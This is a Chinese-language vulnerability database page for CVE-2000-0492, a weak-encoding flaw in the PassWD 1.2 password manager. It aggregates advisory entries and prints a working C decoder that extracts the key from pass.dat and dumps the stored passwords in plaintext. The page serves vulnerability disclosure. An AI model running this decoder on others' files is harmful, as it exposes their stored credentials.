CVE-2000-0492
CVSS5.0
发布时间 :2000-06-04 00:00:00
修订时间 :2008-09-10 15:04:48
NMCOES    

[原文]PassWD 1.2 uses weak encryption (trivial encoding) to store passwords, which allows an attacker who can read the password file to easliy decrypt the passwords.


[CNNVD]PassWD 1.2弱加密漏洞(CNNVD-200006-012)

        PassWD 1.2版本使用弱加密(琐碎编码)存储密码。能读取密码文件的攻击者利用此漏洞可以轻松破解密码。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0492
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0492
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200006-012
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/bugtraq/2000-05/0450.html
(VENDOR_ADVISORY)  BUGTRAQ  20000609 Insecure encryption in PassWD v1.2
http://www.securityfocus.com/bid/1300
(UNKNOWN)  BID  1300

- 漏洞信息

PassWD 1.2弱加密漏洞
中危 设计错误
2000-06-04 00:00:00 2005-10-20 00:00:00
远程※本地  
        PassWD 1.2版本使用弱加密(琐碎编码)存储密码。能读取密码文件的攻击者利用此漏洞可以轻松破解密码。

- 公告与补丁

        Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- 漏洞信息 (19989)

PassWD 1.2 Weak Encryption Vulnerability (EDBID:19989)
windows local
2000-06-04 Verified
0 Daniel Roethlisberger
N/A [点击下载]
source: http://www.securityfocus.com/bid/1300/info

PassWd 1.2 is a password management utility designed to store user login information to various URLs. The login information, which includes username, password and link location is stored in the pass.dat file which resides in the PassWD directory. The information is encrypted with a weak encoding algorithm and includes the key which can be used to decode any stored password. 

/*
 *  Decoder for PassWD v1.2 `pass.dat' password files
 *
 *  Written 2000 by Daniel Roethlisberger <admin@roe.ch>
 *
 *  This code is hereby placed in the public domain.
 *  Use this code at your own risk for whatever you want.
 *
 *  The decoded data is not parsed in any way - it should
 *  be very easy to moderately experienced programmers
 *  to add that themselves.
 *
 */

#include <stdio.h>

void main(int argc, char *argv[])
{
   unsigned char charpos;
   FILE* outfile;
   FILE* infile;
   unsigned char a;
   unsigned char b;
   unsigned char key;
   unsigned char x;

   unsigned char charset[] = "\b\t\n\r !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSPUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\b\t\n\r !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSPUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~";

   printf("\nDecoder for PassWD v1.2 `pass.dat' password files\n");
   printf("Written 2000 by Daniel Roethlisberger <admin@roe.ch>\n\n");

   if((argc > 3) || (argc < 2))
   {
      printf("Usage: %s <infile> [<outfile>]\n\n", argv[0]);
      printf("If <outfile> is omitted, the output is dumped to stdout.\n", argv[0]);
      return;
   }

   infile = fopen(argv[1], "r");
   if(infile == NULL)
   {
      printf("Could not open file %s\n", argv[1]);
      return;
   }

   if(argc == 2)
      outfile = stdout;
   else
   {
      outfile = fopen(argv[2], "w");
      if(outfile == NULL)
      {
         printf("Could not write to file %s\n", argv[2]);
         _fcloseall();
         return;
      }
   }

   getc(infile);       /* jump over decoy byte    */
   a = getc(infile);   /* read encoded key byte 1 */
   b = getc(infile);   /* read encoded key byte 2 */

   if(b == EOF)
   {
      printf("ERROR - encountered EOF within header\n");
      return;
   }

   /* this line `decodes' the key */
   key = (unsigned char)((a - 'b') * 10 + (b - 'b'));

   /* read through infile and dump decoded output to outfile: */
   x = getc(infile);
   while(!feof(infile))
   {
      for(charpos = 0; x != charset[charpos]; charpos++)
      {
         if(charpos > 99)
         {
            printf("\nERROR - encountered illegal character in source file\n");
            _fcloseall();
            return;
         }
      }
      /* plain = cypher - key */
      putc(charset[charpos + 99 - key], outfile);
      x = getc(infile);
   }

   if(argc == 2)
      printf("\n\n");
   printf("Done.\n");

   _fcloseall();
   return;
}




		

- 漏洞信息

6493
PassWD Weogj System Passwords Storage Encryption Weakness
Local Access Required Cryptographic
Loss of Confidentiality Discontinued Product
Exploit Public Vendor Verified, Third-party Verified

- 漏洞描述

- 时间线

2000-06-03 Unknow
2000-06-03 Unknow

- 解决方案

The vendor has discontinued this product and therefore has no patch or upgrade that mitigates this problem. It is recommended that an alternate software package be used in its place.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

PassWD 1.2 Weak Encryption Vulnerability
Design Error 1300
Yes Yes
2000-06-04 12:00:00 2009-07-11 02:56:00
Discovered by and posted to Bugtraq on June 4, 2000 by Daniel Roethlisberger <admin@roe.ch>

- 受影响的程序版本

PassWD PassWD 1.2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0

- 漏洞讨论

PassWd 1.2 is a password management utility designed to store user login information to various URLs. The login information, which includes username, password and link location is stored in the pass.dat file which resides in the PassWD directory. The information is encrypted with a weak encoding algorithm and includes the key which can be used to decode any stored password.

- 漏洞利用

The following exploit has been provided by Daniel Roethlisberger &lt;admin@roe.ch&gt;:

- 解决方案

Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站